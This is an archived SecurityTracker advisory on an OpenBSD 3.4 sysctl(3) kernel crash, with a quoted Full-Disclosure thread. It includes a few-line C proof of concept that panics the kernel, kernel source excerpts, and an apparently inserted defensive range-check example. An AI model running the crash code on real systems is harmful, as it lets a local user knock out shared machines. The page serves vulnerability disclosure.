SecurityTracker.com
SecurityTracker Archives

Category: OS (UNIX) > OpenBSD Kernel
Vendors: OpenBSD
OpenBSD sysctl(3) Flaw Lets Local Users Crash the System
SecurityTracker Alert ID: 1008270
SecurityTracker URL: http://securitytracker.com/id/1008270
CVE Reference: GENERIC-MAP-NOMATCH
Date: Nov 21 2003
Impact: Denial of service via local system
Exploit Included: Yes
Version(s): OpenBSD 3.4 and prior versions
Description:   A vulnerability was reported in OpenBSD in the sysctl(3) function. A local user can cause the system to crash.

It is reported that a local user can call sysctl(3) with certain arguments to cause the kernel to crash.

The flaw reportedly resides in uvm_vsunlock() in 'uvm_glue.c'.

The following demonstration exploit code was provided in a different report:

#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main ()
{
        /* name = { CTL_KERN, 0 }; blah[1] (zero) doubles as the old-length argument */
        unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;

        /* oldp is -4096 + 1 as an unsigned value, i.e. 0xFFFFF001 on a 32-bit
           system: an address at the very top of the address space */
        return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}

Impact:   A local user can cause the system to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL: www.openbsd.org/
Cause:   Boundary error
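The cause field above reads "boundary error", and the demonstration's address of -4096 + 1 is, as an unsigned 32-bit value, 0xFFFFF001: rounding such an address up to the next page boundary wraps to zero, so an end-of-range computed that way lies below its start. The following C is an added example, not OpenBSD's code and not the vendor's fix; it models a 32-bit address space with a constructed page size and user-space ceiling (EX_PAGE_SIZE and EX_VM_MAXUSER_ADDR are assumptions, the ex_ helpers are hypothetical) and shows the overflow-safe check a kernel caller should apply to a user-supplied buffer before wiring it, rejecting the demonstration's range while accepting ordinary ones.

```c
/* Added example, not OpenBSD code: a user-space range check of the kind that
 * must run before a caller such as sysctl(2) wires an oldp/oldlen buffer.
 * The page size, user ceiling and 32-bit address model below are constructed. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define EX_PAGE_SIZE        4096u          /* constructed, i386-style page size */
#define EX_PAGE_MASK        (EX_PAGE_SIZE - 1u)
#define EX_VM_MAXUSER_ADDR  0xBFC00000u    /* constructed user-space ceiling */

typedef uint32_t ex_vaddr_t;   /* 32-bit model so wrap-around is visible on any host */

/* Round an address down / up to a page boundary, exactly as the kernel macros do. */
static ex_vaddr_t ex_trunc_page(ex_vaddr_t a) { return a & ~EX_PAGE_MASK; }
static ex_vaddr_t ex_round_page(ex_vaddr_t a) { return (a + EX_PAGE_MASK) & ~EX_PAGE_MASK; }

/* Classify a user-supplied [addr, addr + len) before wiring it.
 *  0  = acceptable; *startp/*endp receive the page-aligned range
 * -1  = range is not wholly inside user space (including any wrap-around)
 * A zero-length range at a valid address is accepted: there is nothing to wire. */
int ex_check_user_range(ex_vaddr_t addr, size_t len, ex_vaddr_t *startp, ex_vaddr_t *endp)
{
    ex_vaddr_t start, end;

    /* The length alone must fit below the ceiling, else no end can be computed. */
    if (len > (size_t)EX_VM_MAXUSER_ADDR)
        return -1;
    /* Overflow-safe form of "addr + len <= ceiling": never add first and compare later. */
    if (addr > EX_VM_MAXUSER_ADDR - (ex_vaddr_t)len)
        return -1;

    start = ex_trunc_page(addr);
    end   = ex_round_page(addr + (ex_vaddr_t)len);
    /* Defensive: rounding the end up must not have carried past the address space. */
    if (end < start)
        return -1;

    if (startp) *startp = start;
    if (endp)   *endp   = end;
    return 0;
}

int main(void)
{
    ex_vaddr_t s, e;
    /* The advisory's demonstration passes -4096 + 1 as an unsigned address
     * (0xFFFFF001 in a 32-bit space) with a requested old-length of 0. */
    ex_vaddr_t demo_addr = (ex_vaddr_t)(-4096 + 1);

    printf("round_page(0x%08x) = 0x%08x (wraps to zero)\n",
           (unsigned)demo_addr, (unsigned)ex_round_page(demo_addr));
    printf("demonstration range: %s\n",
           ex_check_user_range(demo_addr, 0, &s, &e) == 0 ? "accepted" : "rejected");
    printf("ordinary range:      %s\n",
           ex_check_user_range(0x1000u, 10, &s, &e) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The two checks before the page arithmetic are the important ones: comparing addr against the ceiling minus len, rather than computing addr + len, is what keeps a top-of-address-space pointer from ever reaching the rounding step where it wraps.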

Message History:   This archive entry has one or more follow-up message(s) listed below.
Nov 21 2003 (Vendor Issues Fix) Re: OpenBSD sysctl(3) Flaw Lets Local Users Crash the System
The vendor has issued a fix.


Source Message Contents

Subject:  Re: [Full-Disclosure] OpenBSD kernel panic, yet still O*BSD much



i can confirm this SECURITY vulnerability on all openbsd 3.x.
so apparently searching for "XXX" and/or "FIXME" strings in obsd
kernel is a guaranteed way to locate a ring 0 vulnerability ...
nice, real nice ;P

some examples;

                char buf[128], *bufp;   /* FIXME */
                int len = sh.s_size, path_index, entry_len;

                /* DPRINTF(("COFF shlib size %d offset %d\n",
                         sh.s_size, sh.s_scnptr)); */

                error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf,
                                len, sh.s_scnptr,
...

/*
 * vslock: wire user memory for I/O
 *
 * - called from physio and sys___sysctl
 * - XXXCDC: consider nuking this (or making it a macro?)
 */

void
uvm_vsunlock(p, addr, len)
        struct proc *p;
        caddr_t addr;
        size_t  len;
{
        uvm_fault_unwire(&p->p_vmspace->vm_map, trunc_page((vaddr_t)addr),
                round_page((vaddr_t)addr + len));
}


grep -rn or cscope is your friend ;)


On Wed, 19 Nov 2003 crispin@immunix.com wrote:

>
> ppl think "hey, local DoS sucks", therefore they are.
> i think "hey, obsd sucks", therefore i am.
>
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
>
> int main ()
> {
>         unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
>
>         return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
> }
>
> it's wide, it's opened, it's surely obsd!
>
> --
> Crispin Coward, Ph.D.          http://immunix.com/~crispin/
> Chief Scientist, Immunix       http://immunix.com
>             http://www.immunix.com/tosell/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Copyright 2022, SecurityGlobal.net LLC